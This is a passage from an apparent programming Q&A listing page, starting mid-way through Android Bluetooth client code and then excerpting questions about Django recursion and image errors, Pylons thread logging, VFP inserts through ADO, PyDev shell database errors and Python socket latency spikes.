*/ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); if (D) Log.e(TAG, "+++ ON CREATE +++"); mBluetoothAdapter = BluetoothAdapter.getDefaultAdapter(); if (mBluetoothAdapter == null) { Toast.makeText(this, "Bluetooth is not available.", Toast.LENGTH_LONG).show(); finish(); return; } if (!mBluetoothAdapter.isEnabled()) { Toast.makeText(this, "Please enable your BT and re-run this program.", Toast.LENGTH_LONG).show(); finish(); return; } if (D) Log.e(TAG, "+++ DONE IN ON CREATE, GOT LOCAL BT ADAPTER +++"); } @Override public void onStart() { super.onStart(); if (D) Log.e(TAG, "++ ON START ++"); } @Override public void onResume() { super.onResume(); if (D) { Log.e(TAG, "+ ON RESUME +"); Log.e(TAG, "+ ABOUT TO ATTEMPT CLIENT CONNECT +"); } // Make the phone discoverable // When this returns, it will 'know' about the server, // via it's MAC address. // mBluetoothAdapter.startDiscovery(); BluetoothDevice device = mBluetoothAdapter.getRemoteDevice(address); Log.e(TAG, device.getName() + " connected"); // myServer = new ServerThread(); // myServer.start(); myConnection = new ConnectThread(device); myConnection.start(); } @Override public void onPause() { super.onPause(); if (D) Log.e(TAG, "- ON PAUSE -"); try { btSocket.close(); } catch (IOException e2) { Log.e(TAG, "ON PAUSE: Unable to close socket.", e2); } } @Override public void onStop() { super.onStop(); if (D) Log.e(TAG, "-- ON STOP --"); } @Override public void onDestroy() { super.onDestroy(); if (D) Log.e(TAG, "--- ON DESTROY ---"); } private class ServerThread extends Thread { private final BluetoothServerSocket myServSocket; public ServerThread() { BluetoothServerSocket tmp = null; // create listening socket try { tmp = mBluetoothAdapter .listenUsingRfcommWithServiceRecord( "myServer", MY_UUID); } catch (IOException e) { Log.e(TAG, "Server establishing failed"); } myServSocket = tmp; } public void run() { Log.e(TAG, "Beginn waiting for connection"); BluetoothSocket connectSocket = null; InputStream inStream = null; byte[] buffer = new byte[1024]; int bytes; while (true) { try { connectSocket = myServSocket.accept(); } catch (IOException e) { Log.e(TAG, "Connection failed"); break; } Log.e(TAG, "ALL THE WAY AROUND"); try { connectSocket = connectSocket.getRemoteDevice() .createRfcommSocketToServiceRecord(MY_UUID); connectSocket.connect(); } catch (IOException e1) { Log.e(TAG, "DIDNT WORK"); } // handle Connection try { inStream = connectSocket.getInputStream(); while (true) { try { bytes = inStream.read(buffer); Log.e(TAG, "Received: " + buffer.toString()); } catch (IOException e3) { Log.e(TAG, "disconnected"); break; } } } catch (IOException e) { // TODO Auto-generated catch block e.printStackTrace(); break; } } } void cancel() { } } private class ConnectThread extends Thread { private final BluetoothSocket mySocket; private final BluetoothDevice myDevice; public ConnectThread(BluetoothDevice device) { myDevice = device; BluetoothSocket tmp = null; try { tmp = device.createRfcommSocketToServiceRecord(MY_UUID); } catch (IOException e) { Log.e(TAG, "CONNECTION IN THREAD DIDNT WORK"); } mySocket = tmp; } public void run() { Log.e(TAG, "STARTING TO CONNECT THE SOCKET"); setName("My Connection Thread"); InputStream inStream = null; boolean run = false; //mBluetoothAdapter.cancelDiscovery(); try { mySocket.connect(); run = true; } catch (IOException e) { run = false; Log.e(TAG, this.getName() + ": CONN DIDNT WORK, Try closing socket"); try { mySocket.close(); } catch 
(IOException e1) { Log.e(TAG, this.getName() + ": COULD CLOSE SOCKET", e1); this.destroy(); } } synchronized (ThinBTClient.this) { myConnection = null; } byte[] buffer = new byte[1024]; int bytes; // handle Connection try { inStream = mySocket.getInputStream(); while (run) { try { bytes = inStream.read(buffer); Log.e(TAG, "Received: " + buffer.toString()); } catch (IOException e3) { Log.e(TAG, "disconnected"); } } } catch (IOException e) { // TODO Auto-generated catch block e.printStackTrace(); } // starting connected thread (handling there in and output } public void cancel() { try { mySocket.close(); } catch (IOException e) { Log.e(TAG, this.getName() + " SOCKET NOT CLOSED"); } } } }

    Read the article

  • RuntimeError: maximum recursion depth exceeded while calling a Python object

    - by Bilal Basharat
    this error arises when i try to run the following test case which is written in models.py of my django app named 'administration' : from django.test import Client, TestCase from django.core import mail class ClientTest( TestCase ): fixtures = [ 'testdata.json' ] def test_get_register( self ): response = self.client.get( '/accounts/register/', {} ) self.assertEqual( response.status_code, 200 ) the error arises at this line specifically: response = self.client.get( '/accounts/register/', {} ) my django version is 1.2.1 and python 2.6 and satchmo version is 0.9.2-pre hg-unknown. I code in windows platform(xp sp2). The command to run test case is: python manage.py test administration the complete error log is as follow: site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File 
"build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File 
"build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File 
"build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 101, in by_host site = Site.objects.get(domain=host) File "C:\django\django\db\models\manager.py", line 132, in get return self.get_query_set().get(*args, **kwargs) File "C:\django\django\db\models\query.py", line 336, in get num = len(clone) File "C:\django\django\db\models\query.py", line 81, in __len__ self._result_cache = list(self.iterator()) File "C:\django\django\db\models\query.py", line 269, in iterator for row in compiler.results_iter(): File "C:\django\django\db\models\sql\compiler.py", line 672, in results_iter for rows in self.execute_sql(MULTI): File "C:\django\django\db\models\sql\compiler.py", line 717, in execute_sql sql, params = self.as_sql() File "C:\django\django\db\models\sql\compiler.py", line 65, in as_sql where, w_params = self.query.where.as_sql(qn=qn, connection=self.connection) File "C:\django\django\db\models\sql\where.py", line 91, in as_sql sql, params = child.as_sql(qn=qn, connection=connection) File "C:\django\django\db\models\sql\where.py", line 94, in as_sql sql, params = self.make_atom(child, qn, connection) File "C:\django\django\db\models\sql\where.py", line 141, in make_atom lvalue, params = lvalue.process(lookup_type, params_or_value, connection) File "C:\django\django\db\models\sql\where.py", line 312, in process connection=connection, prepared=True) File "C:\django\django\db\models\fields\subclassing.py", line 53, in inner return func(*args, **kwargs) File "C:\django\django\db\models\fields\subclassing.py", line 53, in inner return func(*args, **kwargs) File "C:\django\django\db\models\fields\__init__.py", line 323, in get_db_prep _lookup return [self.get_db_prep_value(value, connection=connection, prepared=prepar ed)] File "C:\django\django\db\models\fields\subclassing.py", line 53, in inner return func(*args, **kwargs) File "C:\django\django\db\models\fields\subclassing.py", line 53, in inner return func(*args, **kwargs) RuntimeError: maximum recursion depth exceeded while calling a Python object ---------------------------------------------------------------------- Ran 7 tests in 48.453s FAILED (errors=1) Destroying test database 'default'...

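    The frames repeating in pairs show threaded_multihost's by_host alternately stripping and re-adding 'www.' because Site.objects.get(domain=host) never finds a match: the Django test client sends the host 'testserver', and the fixture apparently contains no Site with that domain. A hedged sketch of one way to break the loop is to make sure such a Site exists before the request is made (the domain/name values are illustrative):

        from django.contrib.sites.models import Site
        from django.test import TestCase

        class ClientTest(TestCase):
            fixtures = ['testdata.json']

            def setUp(self):
                # django.test.Client sends 'testserver' as the Host header by default
                Site.objects.get_or_create(domain='testserver',
                                           defaults={'name': 'testserver'})

            def test_get_register(self):
                response = self.client.get('/accounts/register/', {})
                self.assertEqual(response.status_code, 200)
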
    Read the article

  • Logging in worker threads spawned from a pylons application does not seem to work

    - by TimM
    I have a pylons application where, under certain cirumstances I want to spawn multiple worker threads to process items in a queue. Right now we aren't making use of a ThreadPool (would be ideal, but we'll add that in later). The main problem is that the worker threads logging does not get written to the log files. When I run the code outside of the pylons application the logging works fine. So I think its something to do with the pylons log handler but not sure what. Here is a basic example of the code (trimmed down): import logging log = logging.getLogger(__name__) import sys from Queue import Queue from threading import Thread, activeCount def run(input, worker, args = None, simulteneousWorkerLimit = None): queue = Queue() threads = [] if args is not None: if len(args) > 0: args = list(args) args = [worker, queue] + args args = tuple(args) else: args = (worker, queue) # start threads for i in range(4): t = Thread(target = __thread, args = args) t.daemon = True t.start() threads.append(t) # add ThreadTermSignal inputData = list(input) inputData.extend([ThreadTermSignal] * 4) # put in the queue for data in inputData: queue.put(data) # block until all contents are downloaded queue.join() log.critical("** A log line that appears fine **") del queue for thread in threads: del thread del threads class ThreadTermSignal(object): pass def __thread(worker, queue, *args): try: while True: data = queue.get() if data is ThreadTermSignal: sys.exit() try: log.critical("** I don't appear when run under pylons **") finally: queue.task_done() except SystemExit: queue.task_done() pass Take note, that the log lin within the RUN method will show up in the log files, but the log line within the worker method (which is run in a spawned thread), does not appear. Any help would be appreciated. Thanks ** EDIT: I should mention that I tried passing in the "log" variable to the worker thread as well as redefining a new "log" variable within the thread and neither worked. ** EDIT: Adding the configuration used for the pylons application (which comes out of the INI file). So the snippet below is from the INI file. [loggers] keys = root [handlers] keys = wsgierrors [formatters] keys = generic [logger_root] level = WARNING handlers = wsgierrors [handler_console] class = StreamHandler args = (sys.stderr,) level = WARNING formatter = generic [handler_wsgierrors] class = pylons.log.WSGIErrorsHandler args = () level = WARNING format = generic
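
    A plausible explanation, given the INI above, is that the only configured handler is pylons.log.WSGIErrorsHandler, which writes to the wsgi.errors stream of the current request; a spawned worker thread has no request, so its records are silently dropped, while the call in run() happens inside the request and does get written. A hedged sketch of attaching an ordinary file handler so thread logging lands somewhere (path and format are placeholders, not values from the original setup):

        import logging

        log = logging.getLogger(__name__)

        # a handler that does not depend on the WSGI request environment
        handler = logging.FileHandler('/var/log/myapp/worker.log')   # illustrative path
        handler.setFormatter(logging.Formatter(
            '%(asctime)s %(levelname)-8s [%(threadName)s] %(name)s: %(message)s'))
        log.addHandler(handler)
        log.setLevel(logging.DEBUG)

    The same effect can be had by defining an extra FileHandler in the [handlers] section of the INI and listing it on the root logger.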

    Read the article

  • Adding new record to a VFP data table in VB.NET with ADO recordsets

    - by Gerry
    I am trying to add a new record to a Visual FoxPro data table using an ADO recordset, with no luck. The code runs fine with no exceptions, but when I check the dbf after the fact there is no new record. The mDataPath variable shown in the code snippet is the path to the .dbc file for the entire database. A note about the For loop at the bottom: I am adding the body of incoming emails to this MEMO field, so I thought I needed to break the string into 256-character chunks. Any guidance would be greatly appreciated. cnn1.Open("Driver={Microsoft Visual FoxPro Driver};" & _ "SourceType=DBC;" & _ "SourceDB=" & mDataPath & ";Exclusive=No") Dim RS As ADODB.Recordset = New ADODB.Recordset RS.Open("select * from gennote", cnn1, 1, 3, 1) RS.AddNew() 'Assign values to the first three fields RS.Fields("ignnoteid").Value = NextIDI RS.Fields("cnotetitle").Value = "'" & mail.Subject & "'" RS.Fields("cfilename").Value = "''" 'Looping through 254 characters at a time and add the data 'to Ado Field buffer For i As Integer = 1 To Len(memo) Step liChunkSize liStartAt = i liWorkString = Mid(mail.Body, liStartAt, liChunkSize) RS.Fields("mnote").AppendChunk(liWorkString) Next 'Update the recordset RS.Update() RS.Requery() RS.Close()

    Read the article

  • PyDev and Django: PyDev breaking Django shell?

    - by Rosarch
    I've set up a new project, and populated it with simple models. (Essentially I'm following the tut.) When I run python manage.py shell on the command line, it works fine: >python manage.py shell Python 2.6.4 (r264:75708, Oct 26 2009, 08:23:19) [MSC v.1500 32 bit (Intel)] on win32 Type "help", "copyright", "credits" or "license" for more information. (InteractiveConsole) >>> from mysite.myapp.models import School >>> School.objects.all() [] Works great. Then, I try to do the same thing in Eclipse (using a Django project that is composed of the same files.) Right click on mysite project Django Shell with Django environment This is the output from the PyDev Console: >>> import sys; print('%s %s' % (sys.executable or sys.platform, sys.version)) C:\Python26\python.exe 2.6.4 (r264:75708, Oct 26 2009, 08:23:19) [MSC v.1500 32 bit (Intel)] >>> >>> from django.core import management;import mysite.settings as settings;management.setup_environ(settings) 'path\\to\\mysite' >>> from mysite.myapp.models import School >>> School.objects.all() Traceback (most recent call last): File "<console>", line 1, in <module> File "C:\Python26\lib\site-packages\django\db\models\query.py", line 68, in __repr__ data = list(self[:REPR_OUTPUT_SIZE + 1]) File "C:\Python26\lib\site-packages\django\db\models\query.py", line 83, in __len__ self._result_cache.extend(list(self._iter)) File "C:\Python26\lib\site-packages\django\db\models\query.py", line 238, in iterator for row in self.query.results_iter(): File "C:\Python26\lib\site-packages\django\db\models\sql\query.py", line 287, in results_iter for rows in self.execute_sql(MULTI): File "C:\Python26\lib\site-packages\django\db\models\sql\query.py", line 2368, in execute_sql cursor = self.connection.cursor() File "C:\Python26\lib\site-packages\django\db\backends\__init__.py", line 81, in cursor cursor = self._cursor() File "C:\Python26\lib\site-packages\django\db\backends\sqlite3\base.py", line 170, in _cursor self.connection = Database.connect(**kwargs) OperationalError: unable to open database file What am I doing wrong here?
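
    With SQLite, "unable to open database file" usually just means the relative database path in settings.py is being resolved against a different working directory; manage.py runs from the project root, while the PyDev console may not. A hedged sketch of anchoring the path to the settings module (old-style single-database settings shown, matching the 1.1-era tutorial layout; on Django 1.2+ the same idea applies to the DATABASES dict):

        # settings.py
        import os

        PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))

        DATABASE_ENGINE = 'sqlite3'
        DATABASE_NAME = os.path.join(PROJECT_ROOT, 'mysite.db')   # filename is illustrative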

    Read the article

  • Spikes in Socket Performance

    - by Harun Prasad
    We are facing random spikes in a high-throughput transaction processing system using sockets for IPC. Below is the setup used for the run: The client opens and closes a new connection for every transaction, and there are 4 exchanges between the server and the client. We have disabled TIME_WAIT by setting the socket linger (SO_LINGER) option via setsockopt, as we thought the spikes were caused by sockets waiting in TIME_WAIT. There is no processing done for the transaction; only messages are passed. OS used: CentOS 5.4. The average round-trip time is around 3 milliseconds, but sometimes it ranges from 100 milliseconds to a couple of seconds. Steps used for execution and measurement, and the output: Starting the server $ python sockServerLinger.py /dev/null & Starting the client to post 1 million transactions to the server; it logs the time for each transaction in the client.log file. $ python sockClient.py 1000000 client.log Once the execution finishes, the following command will show the execution times greater than 100 milliseconds in the format <line_number>:<execution_time>. $ grep -n "0.[1-9]" client.log | less Below is the example code for the server and client. Server # File: sockServerLinger.py import socket, traceback,time import struct host = '' port = 9999 l_onoff = 1 l_linger = 0 lingeropt = struct.pack('ii', l_onoff, l_linger) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, lingeropt) s.bind((host, port)) s.listen(1) while 1: try: clientsock, clientaddr = s.accept() print "Got connection from", clientsock.getpeername() data = clientsock.recv(1024*1024*10) #print "asdasd",data numsent=clientsock.send(data) data1 = clientsock.recv(1024*1024*10) numsent=clientsock.send(data) ret = 1 while(ret>0): data1 = clientsock.recv(1024*1024*10) ret = len(data) clientsock.close() except KeyboardInterrupt: raise except: print traceback.print_exc() continue Client # File: sockClient.py import socket, traceback,sys import time i = 0 while 1: try: st = time.time() s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) while (s.connect_ex(('127.0.0.1',9999)) != 0): continue numsent=s.send("asd"*1000) response = s.recv(6000) numsent=s.send("asd"*1000) response = s.recv(6000) i+=1 if i == int(sys.argv[1]): break except KeyboardInterrupt: raise except: print "in exec:::::::::::::",traceback.print_exc() continue print time.time() -st
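
    Two cheap things to try (assumptions drawn from the symptoms, not a confirmed diagnosis): with listen(1), a burst of incoming connections can overflow the accept backlog, and a dropped SYN is only retried after roughly 3 seconds, which would look exactly like the multi-second outliers; separately, Nagle's algorithm interacting with delayed ACKs can add tens to hundreds of milliseconds to short request/reply exchanges. A sketch:

        import socket

        # Server side: a deeper accept backlog so bursts of connects are not dropped.
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(('', 9999))
        srv.listen(128)        # instead of listen(1)

        clientsock, clientaddr = srv.accept()
        # Disable Nagle on the connected socket (the client would do the same),
        # so small request/reply writes are sent immediately.
        clientsock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)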

    Read the article

  • Images missing after moving Django to new server

    - by miszczu
    I'm moving a Django project to a new server. I'm a newbie in Django, and I don't know where the upload folder should be. It holds all the images that should be displayed on the website. I haven't seen an upload folder I could specify in the config file, so I'm guessing it should always be in the same location for Django projects, or I just can't find it. Locations are saved in the database. When I put the uploaded files into the media folder, so the URL was like domain.co.uk/media/upload/media/images/year/month/day/image_name.ext (the same as on the old website), the images on the website were still missing. All images are visible if I enter the URL by hand, but Django doesn't seem to see the files. I also checked the Django log file: 2012-05-30 09:13:33,393 ERROR render: Thumbnail tag failed: [in /usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/templatetags/thumbnail.py (line 49)] Traceback (most recent call last): File "/usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/templatetags/thumbnail.py", line 45, in render return self._render(context) File "/usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/templatetags/thumbnail.py", line 97, in _render file_, geometry, **options File "/usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/base.py", line 50, in get_thumbnail cached = default.kvstore.get(thumbnail) File "/usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/kvstores/base.py", line 25, in get return self._get(image_file.key) File "/usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/kvstores/base.py", line 123, in _get value = self._get_raw(add_prefix(key, identity)) File "/usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/kvstores/cached_db_kvstore.py", line 26, in _get_raw value = KVStoreModel.objects.get(key=key).value File "/usr/lib/python2.6/site-packages/django/db/models/manager.py", line 132, in get return self.get_query_set().get(*args, **kwargs) File "/usr/lib/python2.6/site-packages/django/db/models/query.py", line 344, in get num = len(clone) File "/usr/lib/python2.6/site-packages/django/db/models/query.py", line 82, in __len__ self._result_cache = list(self.iterator()) File "/usr/lib/python2.6/site-packages/django/db/models/query.py", line 273, in iterator for row in compiler.results_iter(): File "/usr/lib/python2.6/site-packages/django/db/models/sql/compiler.py", line 680, in results_iter for rows in self.execute_sql(MULTI): File "/usr/lib/python2.6/site-packages/django/db/models/sql/compiler.py", line 735, in execute_sql cursor.execute(sql, params) File "/usr/lib/python2.6/site-packages/django/db/backends/util.py", line 34, in execute return self.cursor.execute(sql, params) File "/usr/lib/python2.6/site-packages/django/db/backends/mysql/base.py", line 86, in execute return self.cursor.execute(query, args) File "/usr/lib64/python2.6/site-packages/MySQLdb/cursors.py", line 174, in execute self.errorhandler(self, exc, value) File "/usr/lib64/python2.6/site-packages/MySQLdb/connections.py", line 36, in defaulterrorhandler raise errorclass, errorvalue DatabaseError: (1146, "Table 'thumbnail_kvstore' doesn't exist") 2012-05-30 09:13:33,396 DEBUG execute: (0.000) SELECT `freetext_freetext`.`id`, `freetext_freetext`.`key`, `freetext_freetext`.`content`, `freetext_freetext`.`active` FROM `freetext_freetext` WHERE (`freetext_freetext`.`active` = True AND `freetext_freetext`.`key` = office-closed-message ); args=(True, u'office-closed-message') 
[in /usr/lib/python2.6/site-packages/django/db/backends/util.py (line 44)] 2012-05-30 09:13:33,399 DEBUG execute: (0.000) SELECT `menus_menu`.`id`, `menus_menu`.`name`, `menus_menu`.`slug`, `menus_menu`.`base_url`, `menus_menu`.`description`, `menus_menu`.`enabled` FROM `menus_menu` WHERE (`menus_menu`.`enabled` = True AND `menus_menu`.`slug` = about ); args=(True, u'about') [in /usr/lib/python2.6/site-packages/django/db/backends/util.py (line 44)] 2012-05-30 09:13:33,401 DEBUG execute: (0.000) SELECT `menus_menuitem`.`id`, `menus_menuitem`.`menu_id`, `menus_menuitem`.`title`, `menus_menuitem`.`url`, `menus_menuitem`.`order` FROM `menus_menuitem` INNER JOIN `menus_menu` ON (`menus_menuitem`.`menu_id` = `menus_menu`.`id`) WHERE `menus_menu`.`slug` = about ORDER BY `menus_menuitem`.`order` ASC; args=(u'about',) [in /usr/lib/python2.6/site-packages/django/db/backends/util.py (line 44)] 2012-05-30 09:13:33,404 DEBUG execute: (0.000) SELECT `freetext_freetext`.`id`, `freetext_freetext`.`key`, `freetext_freetext`.`content`, `freetext_freetext`.`active` FROM `freetext_freetext` WHERE (`freetext_freetext`.`active` = True AND `freetext_freetext`.`key` = contactdetails-footer ); args=(True, u'contactdetails-footer') [in /usr/lib/python2.6/site-packages/django/db/backends/util.py (line 44)] I checked the database 